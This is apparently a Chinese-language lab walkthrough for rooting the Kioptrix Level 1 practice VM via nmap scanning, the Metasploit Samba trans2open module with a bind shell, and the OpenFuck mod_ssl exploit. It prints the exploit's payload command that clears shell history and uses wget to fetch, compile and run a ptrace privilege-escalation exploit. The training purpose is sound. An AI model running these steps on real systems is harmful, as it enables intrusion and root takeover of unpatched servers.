Kioptrix Level 1 渗透方案

目标:Kioptrix Level 1[VMWare]

本机环境:BackTrack5 RC3[VMware](192.168.74.145)

网关:192.168.74.254

使用工具:nmap

#1:查看 Kioptrix 在内网的IP地址。

工具:nmap

命令:nmap 192.168.74.0/24 –n –sP -sn

Kioptrix Level 1 渗透方案_第1张图片

得到IP192.168.74.147

#2:查看 开放端口。

工具:nmap

Kioptrix Level 1 渗透方案_第2张图片


得到开放端口:

22/tcp   open  ssh                  OpenSSH 2.9p2 (protocol 1.99)

80/tcp   open  http                 Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)

111/tcp  open  rpcbind (rpcbind V2) 2 (rpc #100000)

139/tcp  open  netbios-ssn          Samba smbd (workgroup: MYGROUP)

443/tcp  open  ssl/http             Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)

1024/tcp open  status (status V1)   1 (rpc #100024)

发现有Samba,还有Apache OpenSSL

下面会有两种方案Samba 3-A,和Apache OpenSSL 3-B

3-A:利用Samba溢出

工具:metasploit

命令:msfconsole

search


Kioptrix Level 1 渗透方案_第3张图片

命令:use exploit/linux/samba/trans2open


命令:set PAYLOAD linux/x86/shell_bind_tcp


命令:set rhost 192.168.74.147

  show options 查看一下

Kioptrix Level 1 渗透方案_第4张图片


配置完毕,exploit~

Kioptrix Level 1 渗透方案_第5张图片


命令whoami

返回root

溢出成功!

#3-B:利用Apache OpenSSL漏洞溢出。

工具:Nikto

命令:cd /pentest/web/nikto

  ./nikto.pl –host 192.168.74.147 –Display 124

执行的时间很长。耐心等待~

Kioptrix Level 1 渗透方案_第6张图片


发现可用信息:

mod_ssl/2.8.4 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell (difficult to exploit). CVE-2002-0082, OSVDB-756.

打开 Exploit-DB 网站,搜索Apache Openssl


Kioptrix Level 1 渗透方案_第7张图片


下载 764.c

编译,此时发现编译不成功,仔细看缺少的是 rc4md5相关信息。

在头文件中添加

#include 

#include 

Kioptrix Level 1 渗透方案_第8张图片

Exploit的命令在下面,#define COMMAND2 "unset HISTFILE; cd /tmp; wget http://packetstormsecurity.nl/0304-exploits/ptrace-kmod.c; gcc -o p ptrace-kmod.c; rm ptrace-kmod.c; ./p; \n"

需要wget http://packetstormsecurity.nl/0304-exploits/ptrace-kmod.c

还是自己下载一个。本机作为服务器,从内网wget吧。

将此行改为#define COMMAND2 "unset HISTFILE; cd /tmp; wget 192.168.74.145/ptrace-kmod.c; gcc -o p ptrace-kmod.c; rm ptrace-kmod.c; ./p; \n"



下载 一个ptrace-kmod.c

复制到 /var/www/目录下

开启Apache服务

编译方法在 注释中gcc -o OpenFuck OpenFuck.c –lcrypto

命令:gcc –o OpenFuck 764.c –lcrypto

执行 ./OpenFuck 看到提示信息


Kioptrix Level 1 渗透方案_第9张图片

0x6b - RedHat Linux 7.2 (apache-1.3.20-16)2

命令:./OpenFuck 0x6b 192.168.74.147 

Kioptrix Level 1 渗透方案_第10张图片

命令whoami

返回root

溢出成功!

#4:执行mail查看邮件

命令:mail

  1

Kioptrix Level 1 渗透方案_第11张图片

成功~

第一次搞这个。。

参考了linux520的教程,和springemp大牛的教程。










你可能感兴趣的:(Kioptrix)